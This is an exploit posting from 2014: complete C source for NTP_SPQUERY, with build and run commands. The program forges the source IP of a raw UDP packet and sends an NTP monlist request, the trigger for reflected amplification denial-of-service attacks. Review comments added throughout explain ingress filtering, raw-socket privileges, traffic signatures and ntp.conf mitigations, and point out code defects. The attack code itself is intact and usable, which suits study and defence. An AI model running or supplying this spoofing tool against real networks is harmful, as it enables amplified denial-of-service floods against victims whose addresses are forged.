
NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
Posted Mar 19, 2014
Authored by Mark Osborne

NTP_SPQUERY.C is a spoofed "monlist query" program which can generate packets like those used in reflected amplification NTP attacks that were common in early 2014. Written entirely in C, it requires no special libraries or header files and is designed to run on most Linux distributions.

tags | exploit, denial of service, spoof, proof of concept
SHA-256 | b2921a12ef46feaba746bf166e1ad786a8a6d84e3174834a115c9770328ac219

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

//   PROGRAM :   NTP_SPQUERY.c
//
// AUTHOR : loud-fat-bloke / MARK OSBORNE
//
// Description:
//
// REFLECTED AMPLIFICATION NTP ATTACK
//
// A well known security journal has asked me to do a piece on NTP DDoS
// and, being a bit reactionary (OCD in other words),
// I figured I would show that NTP and DNS DRDoS are related and conform to a common formula.
// Therefore I have converted the DNS_SPQUERY program I wrote 6 months ago into NTP_SPQUERY with minimal changes
//
// NTP_SPQUERY.C generates the "monlist query" used in the REFLECTED AMPLIFICATION NTP ATTACKS that are common in March 2014
//
//
// As part of the charity project
// "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//
// I have tried to use a book, YouTube presentations, in-person lectures and Android apps to highlight three key cyber points:
// 1 - that in Europe a cyber attack by any group of proficient, computer-literate parties could cripple the infrastructure
// 2 - that formalised cyber security monitoring is required to prevent this - not militaristic, counter-espionage initiatives
// which are hangovers from the Cold War
// 3 - privacy campaigners generally make things worse by assuming "cyber security" monitoring fits into the
// espionage initiatives described above
//
// charity project? - proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
// **** DO NO HARM WITH THIS PROGRAM *********
//
// the author has produced it for educational purposes only
//
//
/* to build and run me cut and paste the below 10 lines into your shell on a nice LINUX box
# compile me
#
gcc ntp_spquery.c -o ntp_spquery
#
# run me
# SPOOFED_S_IP NTP SERVER TARGET
./ntp_spquery 192.168.0.121 192.168.0.120
#
#
#
#
*/
/* Horizontal rule that main() prints between the banner and the hex dump of the payload. */
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
// File-scope scratch variables. Neither udpsockfd nor n is referenced by any
// code visible in this listing (spoofudp() opens its own descriptor, sd).
int udpsockfd,n;

// Program name substituted into the usage() message.
#define PROGRAM "NTP_SPQUERY"


// NTP header structure.
// NOTE(review): no code visible in this listing uses this struct; main() writes
// the request bytes directly into buf instead. Bit-field order and packing are
// implementation-defined in C, so this declaration does not pin down an
// on-the-wire layout.
struct NTP_HEADER
{
unsigned short id; // identification number

unsigned char li :2; // 2-bit field; presumably "leap indicator" -- confirm, unused here
unsigned char vn :3; // 3-bit field; presumably "version number" -- confirm, unused here
unsigned char rb :1; // 1-bit flag; meaning not shown in this listing
unsigned char eb :1; // 1-bit flag; meaning not shown in this listing
unsigned char mb :1; // 1-bit flag; meaning not shown in this listing
unsigned char opcode :5; // 5-bit field; unused here
unsigned char data[10] ; // 10 bytes following the bit-fields; contents not shown
};

/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/

// Banner text printed by main() at start-up (tool title and book reference).
// Both strings are passed to printf() as the format argument; neither contains
// a '%' conversion.
char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

// Payload buffer: main() writes the NTP request bytes here and hands it to spoofudp().
unsigned char buf[4000];
// Number of payload bytes main() asks spoofudp() to send (main() sets it to 9).
int data_length ;

/*


# LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Fixed header sizes that spoofudp() uses to lay out its packet buffer.
// IP4_HDRLEN agrees with ip_hl = 5 set there (5 x 32-bit words, i.e. no IP options).
#define IP4_HDRLEN 20 // IPv4 header length
#define UDP_HDRLEN 8 // UDP header length, excludes data

/*
 * spoofudp - build one IPv4/UDP datagram by hand and send it on a raw socket.
 *
 * saddr     dotted-quad string written into the IP source field as-is; it is
 *           never compared with any address the sending host owns
 * sport     UDP source port (host byte order, converted with htons)
 * daddr     dotted-quad string used for the IP destination field and for the
 *           sendto() address
 * dport     UDP destination port (host byte order, converted with htons)
 * datalen   number of bytes copied from udppacket into the UDP payload
 * udppacket payload bytes
 *
 * A failing socket(), setsockopt() or sendto() is reported with perror() and
 * ends the process (exit status 2, 3 and EXIT_FAILURE respectively).
 *
 * Defensive reading: the source field is whatever the caller supplies, so the
 * receiving server cannot tell this datagram from a genuine request and will
 * address any reply to saddr. The control that stops such a packet is
 * source-address validation at the network edge (RFC 2827 ingress filtering,
 * which the comments in main() also mention). On the host side, creating a
 * SOCK_RAW socket on Linux requires CAP_NET_RAW, so accounts and containers
 * that are not granted it cannot emit hand-built headers.
 *
 * NOTE(review): declared int but there is no return statement; main() ignores
 *               the result, so the missing value is never read.
 * NOTE(review): datalen is not checked before the memcpy below. x holds 10000
 *               bytes and 28 are reserved for headers, so a negative or larger
 *               value would write outside the stack buffer. main() only ever
 *               passes 9.
 * NOTE(review): the inet_addr() results are stored without checking for
 *               INADDR_NONE, so a malformed address string is not rejected.
 */
int
spoofudp (char *saddr,int sport, char *daddr, int dport, int datalen, char *udppacket)
{
int sd ;
const int on = 1;
// NOTE(review): the iphdr and udphdr objects are never used, only the pointers.
struct ip iphdr, *iphdr_ptr;
struct udphdr udphdr, *udphdr_ptr;
unsigned char *data, *packet;
struct sockaddr_in sin;
unsigned char x[10000]; // the buffer (stack storage, not zeroed)
// No heap allocation: every header pointer below aliases the stack buffer x.
packet = x ;
// NOTE(review): unsigned char * is assigned to struct ip * without a cast;
// compilers diagnose this as an incompatible pointer type.
iphdr_ptr = x ;
// datalen = dnslength;   (leftover from the DNS version of this program)
// UDP header sits directly after the 20-byte IPv4 header.
// NOTE(review): same uncast pointer conversion as above.
udphdr_ptr = (packet + IP4_HDRLEN);
// UDP payload starts after both headers (offset 28).
data = (packet + IP4_HDRLEN + UDP_HDRLEN);
// Copy the caller's payload into place; datalen is trusted as given.
memcpy (data , udppacket ,datalen );
// IPv4 header
iphdr_ptr->ip_hl =5; // header length in 32-bit words: 5 * 4 = IP4_HDRLEN
iphdr_ptr->ip_v = 4;
iphdr_ptr->ip_tos = 0;
iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
iphdr_ptr->ip_id = htons (0);
iphdr_ptr->ip_off = htons (0); // no fragmentation flags or offset
iphdr_ptr->ip_ttl = 255;
iphdr_ptr->ip_p = IPPROTO_UDP;
iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );
iphdr_ptr->ip_src.s_addr = inet_addr (saddr ); /* source field taken verbatim from the caller (spoofed) */
iphdr_ptr->ip_sum = 0; // left 0; the author relies on the kernel to fill in the IP header checksum

// UDP header
udphdr_ptr->source = htons (sport);
udphdr_ptr->dest = htons (dport);
udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
// Left 0. NOTE(review): in UDP over IPv4 a zero checksum means "not computed"
// (RFC 768); the author's original comment expected the kernel to fill it in,
// which nothing in this listing establishes -- confirm.
udphdr_ptr->check = 0;
// Zero the socket address, then point it at the same destination as the IP header.
memset (&sin, 0, sizeof (struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
// Open a raw socket; this is the privileged step and fails for callers
// that lack the raw-socket privilege.
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror ("socket() failed ");
exit (2);
}
// IP_HDRINCL tells the kernel that the buffer already starts with an IP
// header; without it the kernel would prepend its own. Author's note: nearly
// all Linux kernels allow this, many BSD, Sun, AIX and HP systems do not.
if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
perror ("setsockopt() failed to set IP_HDRINCL ");
exit (3);
}
// Send the packet: one datagram of 28 + datalen bytes. sd is not closed on
// this error path, but the process exits immediately.
if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) {
perror ("sendto() failed ");
exit (EXIT_FAILURE);
}
// Close socket descriptor.
close (sd);
}


/* Write the expected command line to stderr, then end the process with status 1. */
usage ()
{
    static const char fmt[] = "Program Usage: \n %s SOURCE_DOT_ADDR DEST_DOT_ADDR \n\n";

    fprintf(stderr, fmt, PROGRAM);
    exit(1);
}

// NOTE(review): out, len1, len2 and len3 are not referenced by the code visible
// in this listing; pants is only the loop index of the hex dump in main().
unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0 ;
int pants;

/*
 * main - print the banner, place a fixed NTP request in buf, hex-dump it and
 * pass it to spoofudp() exactly once.
 *
 * argv[1] becomes the IP source address of the packet and argv[2] its
 * destination; neither string is validated here. Returns 0. usage() ends the
 * process with status 1 when the argument count is not 3.
 *
 * What a defender can take from the payload: the request is the byte sequence
 * 17 00 03 2a sent to UDP port 123. Read against the ntpd mode 7 ("private")
 * layout, 0x17 is version 2 / mode 7, 0x03 the implementation number and
 * 0x2a (42) the monlist request code. Mode 7 requests with code 42 arriving at
 * UDP/123, and large mode 7 replies leaving it, are therefore the traffic to
 * match in IDS or flow data. On the server side the answer is to stop serving
 * the query: `restrict default noquery` or `disable monitor` in ntp.conf, or an
 * ntpd release that no longer implements monlist.
 */
int
main( int argc , char *argv[])
{
char *out_temp; // NOTE(review): never used
if ( argc != 3 )
usage();
// NOTE(review): a variable is passed as the printf format string. That is safe
// here only because the banner strings are fixed and contain no '%'.
/* */ printf(pretyy ) ;
/* */ printf(pretyz ) ;
printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t %s \n \n \n ", argv[1] ,
argv[2] );
// Clear the first 255 bytes of buf (buf has static storage, so it starts zeroed anyway).
memset(buf,0x00,0xfF);
// Write the five request bytes; %c with 0 stores a NUL byte and carries on.
// The low three bits of 0x17 are 7, i.e. mode 7, not the "Mode = 3" stated in
// the comment block earlier in the file.
// NOTE(review): buf is unsigned char[] where sprintf expects char * (signedness warning).
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

// Nine bytes are sent: the five written above plus four that are still zero.
data_length = 9 ;
printf(pretty ) ;
//
//
// Hex dump of the first 30 bytes of buf, which is more than the 9 bytes sent.
for (pants=0; pants < 30 ; pants++ )
printf("%x ", buf[pants]);
//

printf("\nNTP PACKET len \t \t %i \n" , data_length ) ;
//
// Writes out a spoofed UDP Packet
// written for my rfc 2827 survey which never got finished
//
// One packet only: source port fixed at 4950, destination port 123 (NTP).
// NOTE(review): buf (unsigned char[]) is passed for a char * parameter.
spoofudp (argv[1] ,4950, argv[2] , 123 , data_length, buf );

return 0;
}